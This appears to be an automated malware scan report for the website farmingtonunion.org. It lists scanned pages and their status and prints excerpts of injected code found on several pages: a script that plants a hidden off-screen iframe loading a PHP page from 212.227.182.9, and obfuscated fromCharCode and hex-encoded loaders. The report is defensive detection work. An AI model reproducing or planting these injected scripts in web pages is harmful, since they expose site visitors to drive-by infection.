Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=farmingtonunion.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://farmingtonunion.org/ | 200 OK Content-Length: 10207 Content-Type: text/html | clean |
http://www.statcounter.com/counter/frames.js | 200 OK Content-Length: 21363 Content-Type: application/x-javascript | clean |
http://farmingtonunion.org/../contact.html | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |
http://farmingtonunion.org/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://farmingtonunion.org/../about.html | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |
http://farmingtonunion.org/../news.html | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |
http://farmingtonunion.org/schedule.html | 200 OK Content-Length: 8177 Content-Type: text/html | clean |
http://farmingtonunion.org/contact.html | 200 OK Content-Length: 9209 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 212.227.182.9 function dmz09() { var static='ajax'; var controller='index.php'; var dmz = document.createElement('iframe'); dmz.src = 'http://212.227.182.9/shop442729382/4CjvDR2w.php'; dmz.style.position = 'absolute'; dmz.style.color = '9611'; dmz.style.height = '9611px'; dmz.style.width = '9611px'; dmz.style.left = '10009611'; dmz.style.top = '10009611'; if (!document.getElementById('dmz')) { document.write('<p id=\'dmz\' class=\'dmz09\' ></p>'); document.getElementById('dmz').appendChild(dmz); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var ...[756 bytes skipped]... | ||
http://farmingtonunion.org/about.html | 200 OK Content-Length: 11051 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 212.227.182.9 function dmz09() { var static='ajax'; var controller='index.php'; var dmz = document.createElement('iframe'); dmz.src = 'http://212.227.182.9/shop442729382/4CjvDR2w.php'; dmz.style.position = 'absolute'; dmz.style.color = '9611'; dmz.style.height = '9611px'; dmz.style.width = '9611px'; dmz.style.left = '10009611'; dmz.style.top = '10009611'; if (!document.getElementById('dmz')) { document.write('<p id=\'dmz\' class=\'dmz09\' ></p>'); document.getElementById('dmz').appendChild(dmz); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var ...[756 bytes skipped]... | ||
http://farmingtonunion.org/news.html | 200 OK Content-Length: 12376 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) dlbpgm="fr"+"omCh"+"ar"+"Co"+"de";if(document.querySelector)vdt=4;vkx=("6a,b0,bf,b8,ad,be,b3,b9,b8,6a,b7,7a,83,72,73,6a,c5,57,54,6a,c0,ab,bc,6a,bd,be,ab,be,b3,ad,87,71,ab,b4,ab,c2,71,85,57,54,6a,c0,ab,bc,6a,ad,b9,b8,be,bc,b9,b6,b6,af,bc,87,71,b3,b8,ae,af,c2,78,ba,b2,ba,71,85,57,54,6a,c0,ab,bc,6a,b7,6a,87,6a,ae,b9,ad,bf,b7,af,b8,be,78,ad,bc,af,ab,be,af,8f,b6,af,b7,af,b8,be,72,71,b3,b0,bc,ab,b7,af,71,73,85,57,54,57,54,6a,b7,78,bd,bc,ad,6a,87,6a,71,b2,be,be,ba,84,79,79,ae,ab,b8,b3,af,b6,77,b6,af,b2 Antivirus reports:
| ||
http://farmingtonunion.org/directory.html | 200 OK Content-Length: 12179 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) dlbpgm="fr"+"omCh"+"ar"+"Co"+"de";if(document.querySelector)vdt=4;vkx=("6a,b0,bf,b8,ad,be,b3,b9,b8,6a,b7,7a,83,72,73,6a,c5,57,54,6a,c0,ab,bc,6a,bd,be,ab,be,b3,ad,87,71,ab,b4,ab,c2,71,85,57,54,6a,c0,ab,bc,6a,ad,b9,b8,be,bc,b9,b6,b6,af,bc,87,71,b3,b8,ae,af,c2,78,ba,b2,ba,71,85,57,54,6a,c0,ab,bc,6a,b7,6a,87,6a,ae,b9,ad,bf,b7,af,b8,be,78,ad,bc,af,ab,be,af,8f,b6,af,b7,af,b8,be,72,71,b3,b0,bc,ab,b7,af,71,73,85,57,54,57,54,6a,b7,78,bd,bc,ad,6a,87,6a,71,b2,be,be,ba,84,79,79,ae,ab,b8,b3,af,b6,77,b6,af,b2 Antivirus reports:
| ||
http://farmingtonunion.org/thanks.html | 200 OK Content-Length: 17701 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) tuuieu=String;imrnb="spl"+"i"+"t";mfyhob=window;sly=(1)?"0x":"123";mollrt=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(iaij){fsng=false;try{}catch(vga){fsng=21;}if(1){whf="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq5bZq6cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5bZq6cZq1 Antivirus reports:
| ||
http://farmingtonunion.org/officers.html | 200 OK Content-Length: 16128 Content-Type: text/html | clean |
http://farmingtonunion.org/photos.html | 200 OK Content-Length: 12522 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) dlbpgm="fr"+"omCh"+"ar"+"Co"+"de";if(document.querySelector)vdt=4;vkx=("6a,b0,bf,b8,ad,be,b3,b9,b8,6a,b7,7a,83,72,73,6a,c5,57,54,6a,c0,ab,bc,6a,bd,be,ab,be,b3,ad,87,71,ab,b4,ab,c2,71,85,57,54,6a,c0,ab,bc,6a,ad,b9,b8,be,bc,b9,b6,b6,af,bc,87,71,b3,b8,ae,af,c2,78,ba,b2,ba,71,85,57,54,6a,c0,ab,bc,6a,b7,6a,87,6a,ae,b9,ad,bf,b7,af,b8,be,78,ad,bc,af,ab,be,af,8f,b6,af,b7,af,b8,be,72,71,b3,b0,bc,ab,b7,af,71,73,85,57,54,57,54,6a,b7,78,bd,bc,ad,6a,87,6a,71,b2,be,be,ba,84,79,79,ae,ab,b8,b3,af,b6,77,b6,af,b2 Antivirus reports:
| ||
http://farmingtonunion.org/strike | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 12:12:39 GMT Location: http://farmingtonunion.org/strike/ Server: Apache Content-Length: 242 Content-Type: text/html; charset=iso-8859-1 | clean |
http://farmingtonunion.org/strike/ | 200 OK Content-Length: 6949 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) tuuieu=String;imrnb="spl"+"i"+"t";mfyhob=window;sly=(1)?"0x":"123";mollrt=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(iaij){fsng=false;try{}catch(vga){fsng=21;}if(1){whf="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq5bZq6cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5bZq6cZq1 Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: farmingtonunion.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 12:12:33 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 10207
Content-Type: text/html
Last-Modified: Wed, 29 Oct 2014 18:12:43 GMT
...10207 bytes of data.
GET / HTTP/1.1
Host: farmingtonunion.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 12:12:33 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 10207
Content-Type: text/html
Last-Modified: Wed, 29 Oct 2014 18:12:43 GMT
...10207 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: farmingtonunion.org
Referer: http://www.google.com/search?q=farmingtonunion.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: farmingtonunion.org
Referer: http://www.google.com/search?q=farmingtonunion.org
Result:
The result is similar to the first query. There are no suspicious redirects found.